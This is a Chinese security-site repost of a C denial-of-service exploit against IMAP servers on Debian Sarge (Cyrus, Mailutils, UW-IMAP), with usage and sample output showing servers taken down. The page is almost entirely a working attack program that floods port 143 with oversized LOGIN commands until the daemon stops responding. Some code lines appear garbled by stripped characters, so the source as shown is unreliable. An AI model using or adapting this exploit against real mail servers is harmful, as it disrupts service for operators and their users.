• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Debian Sarge Multiple IMAP Server Denial of Service Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Debian Sarge Multiple IMAP Server Denial of Service Exploit ,其中包含sarge,sarge fan,sarge tv series 1971,sarge 刀,sarge是什么意思等知识点,遇到此问题的同学们可以参考下
/*

Debian Sarge Multiple IMAP Server DoS (debianimapers.c)
Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

Testing Cyrus IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

Testing Mailutil's IMAP4d:

bash$ ./debianimapers 192.168.0.189

.....

38 tries and imapd goes down! Mission Complete!

Testing UW-IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

bash$

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define COUNT 100
#define SIZE 100000

char imaplogin[] = "A0001 LOGIN";

int main(int argc, char *argv[])
{

char buffer[SIZE], imapped[SIZE 30];
int i, port = 143;

memset(buffer, 0x41, sizeof(buffer));
memset(imapped, 0, sizeof(imapped));

snprintf(imapped, sizeof(imapped)-1, "%s %s %s\r\n\r\n", imaplogin, buffer, buffer);

if(argc < 2)
{

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

printf("\nUsage %s <host>\n\n", argv[0]);

return 0;
}

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

int sock;
struct sockaddr_in remote;

remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)\n", argv[1], port); return -1; }

close(sock);

printf("\nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...\n");

for(i = 0; i <= COUNT; i )
{

struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }

sleep(1);

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("\n%d tries and imapd goes down! Mission Complete!\n\n", i); return -1; }

int len = sizeof(imapped);
send(sock, imapped, len, 0);
close(sock);

}

return 0;
}

</div>

您可能想查找下面的文章:

  • Debian Sarge Multiple IMAP Server Denial of Service Exploit

相关文章

  • Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day
  • Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
  • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
  • Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
  • DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit
  • HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
  • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
  • iGaming CMS
  • CodeDB (list.php lang) Local File Inclusion Vulnerability
  • MFORUM 0.1a Arbitrary Add-Admin Vulnerability

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • CodeDB (list.php lang) Local File Inclusion Vulnerability
    • php Help Agent
    • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
    • The Personal FTP Server 6.0f RETR Denial of Service Exploit
    • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
    • BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
    • TGS CMS 0.3.2r2 Remote Code Execution Exploit
    • iGaming CMS
    • Sun xVM VirtualBox
    • Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有